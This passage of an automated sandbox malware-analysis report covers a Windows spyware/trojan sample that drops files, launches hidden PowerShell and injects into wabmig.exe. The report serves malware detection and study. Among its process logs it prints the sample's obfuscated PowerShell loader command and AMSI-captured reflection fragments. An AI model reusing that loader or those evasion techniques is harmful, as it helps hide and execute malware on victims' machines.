            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4D0F8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4CC8F
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4CCA0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D40040
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4FC68
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4F810
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D45018
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4F801
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4003B
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D48B90
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4178F
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4F3B8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D48BA0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4F3A8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4EF51
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4EF60
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4EB08
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D40B2F
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4E6B0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4E6AF
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4E258
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4E249
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D41E70
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 7_2_25D4DE00
            Source: file.exe Static PE information: invalid certificate
            Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/12@3/4
            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004021AF CoCreateInstance
            Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\acneform
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
            Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\nskB008.tmp
            Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: file.exe ReversingLabs: Detection: 21%
            Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
            Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Sprag=Get-Content 'C:\Users\user\AppData\Local\acneform\Camomiles.Bev';$Depurge=$Sprag.SubString(30781,3);.$Depurge($Sprag)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Sprag=Get-Content 'C:\Users\user\AppData\Local\acneform\Camomiles.Bev';$Depurge=$Sprag.SubString(30781,3);.$Depurge($Sprag)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
            Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: iertutil.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: winhttp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: winnsi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: urlmon.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: srvcli.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: netutils.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: mscoree.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: version.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: rasman.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: rtutils.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: secur32.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: schannel.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: mskeyprotect.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: ntasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: ncrypt.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: ncryptsslp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: gpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2216409652.0000000008695000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: qm.Core.pdb source: powershell.exe, 00000002.00000002.2212699188.000000000750D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2216409652.000000000864F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 00000002.00000002.2212699188.00000000074F1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2212699188.00000000074F1000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Yara match | File source: 00000002.00000002.2217265751.000000000B997000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Eastness $Gaysome $Nonpassible), (Galleins @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Vaadomraader = [AppDomain]::CurrentDomain.GetAssemblies()$global
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($besaettelsestid)), $Gangstiens10).DefineDynamicModule($Bobjerom, $false).DefineType($Dygtiggrelsens, $Zigzaggery, [System.MulticastDel
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04C0AD10 push eax; ret | 2_2_04C0ADD9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04C0D23C push eax; ret | 2_2_04C0D23D
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 7_2_00949C30 push esp; retf 22CAh | 7_2_00949D55
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 7_2_0094891E pushad ; iretd | 7_2_0094891F
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 7_2_00948C2F pushfd ; iretd | 7_2_00948C30
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 7_2_00948DDF push esp; iretd | 7_2_00948DE0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 7_2_00942D49 push 8BFFFFFFh; retf | 7_2_00942D4F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\acneform\Tjenestepligterne\file.exe
            Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX (2 identical entries)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (72 identical entries)
            Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Process information set: NOOPENFILEERRORBOX (58 identical entries)

            Malware Analysis System Evasion

            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | API/Special instruction interceptor: Address: 6E4026E
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Memory allocated: 940000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Memory allocated: 22DE0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Memory allocated: 24DE0000 memory reserve | memory write watch
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 599890
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 599780
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 599661
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 599546
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 599437
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 599318
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 599203
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 599093
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 598982
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 598875
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 598762
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 598648
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 598546
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 598437
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 598326
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 598216
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 598109
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 598000
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 597890
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 597781
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 597671
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 597562
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 597453
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 597343
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 597234
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 597116
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 597015
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 596905
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 596796
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 596680
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 596557
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 596453
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 596343
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 596222
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 596094
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 595968
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 595841
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 595731
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 595622
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 595515
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 595406
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 595297
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 595178
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 595049
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 594922
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 594797
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 594687
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 594578
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Thread delayed: delay time: 594469
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7141
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2526
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Window / User API: threadDelayed 3881
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Window / User API: threadDelayed 5963
            Source: C:\Users\user\Desktop\file.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -33204139332677172s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 5652Thread sleep count: 3881 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 5652Thread sleep count: 5963 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -599780s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -599661s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -599546s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -599318s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -599203s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -599093s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598982s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598875s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598762s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598648s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598546s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598437s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598326s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598216s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598109s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -597890s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -597781s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -597671s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -597562s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -597453s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -597343s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -597234s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -597116s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -597015s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -596905s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -596796s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -596680s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -596557s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928 Thread sleep time: -596453s >= -30000s
